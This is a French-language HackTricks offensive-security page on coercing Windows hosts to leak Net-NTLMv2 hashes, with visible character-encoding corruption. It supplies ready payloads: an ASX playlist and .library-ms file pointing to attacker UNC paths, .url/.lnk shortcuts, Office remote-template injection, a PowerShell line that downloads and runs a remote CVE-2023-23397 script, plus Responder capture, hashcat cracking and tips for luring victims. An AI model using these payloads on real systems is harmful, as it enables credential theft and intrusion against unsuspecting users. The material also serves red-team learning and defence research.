Endroits pour voler NTLM creds
Reading time: 7 minutes
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :
HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
Consultez toutes les excellentes idĂ©es de https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ â du tĂ©lĂ©chargement d'un fichier Microsoft Word en ligne Ă la ntlm leaks source : https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md et https://github.com/p0dalirius/windows-coerced-authentication-methods
Windows Media Player playlists (.ASX/.WAX)
Si vous parvenez Ă faire ouvrir ou prĂ©visualiser Ă une cible une Windows Media Player playlist que vous contrĂŽlez, vous pouvez leak NetâNTLMv2 en pointant l'entrĂ©e vers un chemin UNC. WMP tentera de rĂ©cupĂ©rer le mĂ©dia rĂ©fĂ©rencĂ© via SMB et s'authentifiera implicitement.
Exemple de payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Flux de collecte et de cracking:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer gĂšre de maniĂšre non sĂ©curisĂ©e les fichiers .library-ms lorsqu'ils sont ouverts directement Ă partir d'une archive ZIP. Si la dĂ©finition de la bibliothĂšque pointe vers un chemin UNC distant (par ex., \attacker\share), le simple fait de parcourir/lancer le .library-ms Ă l'intĂ©rieur du ZIP amĂšne Explorer Ă Ă©numĂ©rer le UNC et Ă Ă©mettre une authentification NTLM vers l'attaquant. Cela gĂ©nĂšre un NetNTLMv2 qui peut ĂȘtre cracked hors ligne ou potentiellement relayed.
Exemple minimal de .library-ms pointant vers un UNC contrÎlé par l'attaquant
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Ătapes opĂ©rationnelles
- CrĂ©ez le fichier .library-ms avec le XML ciâdessus (dĂ©finissez votre IP/nom d'hĂŽte).
- Zippez-le (sur Windows : Send to â Compressed (zipped) folder) et livrez le ZIP Ă la cible.
- Lancez un NTLM capture listener et attendez que la victime ouvre le .library-ms depuis lâintĂ©rieur du ZIP.
Outlook calendar reminder sound path (CVE-2023-23397) â zeroâclick NetâNTLMv2 leak
Microsoft Outlook for Windows traitait la propriĂ©tĂ© MAPI Ă©tendue PidLidReminderFileParameter dans les Ă©lĂ©ments de calendrier. Si cette propriĂ©tĂ© pointe vers un chemin UNC (p. ex., \attacker\share\alert.wav), Outlook contacterait le partage SMB lorsque le rappel se dĂ©clenche, provoquant le leak du NetâNTLMv2 de lâutilisateur sans aucun clic. Cela a Ă©tĂ© corrigĂ© le 14 mars 2023, mais câest toujours trĂšs pertinent pour les flottes legacy/non mises Ă jour et pour lâanalyse dâincidents historiques.
Exploitation rapide avec PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
CÎté Listener:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Remarques
- Une victime a seulement besoin dâavoir Outlook for Windows en cours dâexĂ©cution lorsque le rappel se dĂ©clenche.
- Le leak fournit NetâNTLMv2, adaptĂ© Ă lâoffline cracking ou au relay (pas passâtheâhash).
.LNK/.URL basĂ© sur l'icĂŽne zeroâclick NTLM leak (CVEâ2025â50154 â contournement de CVEâ2025â24054)
Windows Explorer affiche automatiquement les icĂŽnes des raccourcis. Des recherches rĂ©centes ont montrĂ© que, mĂȘme aprĂšs le patch dâavril 2025 de Microsoft pour les raccourcis dâicĂŽnes UNC, il Ă©tait toujours possible de dĂ©clencher une authentification NTLM sans clics en hĂ©bergeant la cible du raccourci sur un chemin UNC et en laissant lâicĂŽne locale (contournement du patch attribuĂ© CVEâ2025â50154). La simple visualisation du dossier amĂšne Explorer Ă rĂ©cupĂ©rer les mĂ©tadonnĂ©es de la cible distante, envoyant NTLM vers le serveur SMB de lâattaquant.
Payload minimal Internet Shortcut (.url) :
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Payload de raccourci de programme (.lnk) via PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Idées de livraison
- Placez le raccourci dans une archive ZIP et incitez la victime Ă la parcourir.
- Placez le raccourci sur un partage accessible en écriture que la victime ouvrira.
- Combinez avec d'autres fichiers d'appĂąt dans le mĂȘme dossier pour que Explorer prĂ©visualise les Ă©lĂ©ments.
Office remote template injection (.docx/.dotm) pour forcer NTLM
Les documents Office peuvent référencer un template externe. Si vous définissez le template joint sur un chemin UNC, l'ouverture du document s'authentifiera auprÚs de SMB.
Modifications minimales des relations DOCX (à l'intérieur de word/):
- Ăditez word/settings.xml et ajoutez la rĂ©fĂ©rence au template joint :
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Ăditez word/_rels/settings.xml.rels et pointez rId1337 vers votre UNC :
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Repaqueter en .docx et livrer. Lancez votre listener de capture SMB et attendez l'ouverture.
Pour des idées post-capture sur le relaying ou l'abus de NTLM, consultez :
Références
- HTB Fluffy â ZIP .libraryâms auth leak (CVEâ2025â24071/24055) â GenericWrite â AD CS ESC16 to DA (0xdf)
- HTB: Media â WMP NTLM leak â NTFS junction to webroot RCE â FullPowers + GodPotato to SYSTEM
- Morphisec â 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC â Microsoft mitigates Outlook EoP (CVEâ2023â23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate â Zeroâclick, one NTLM: Microsoft security patch bypass (CVEâ2025â50154)
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :
HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
HackTricks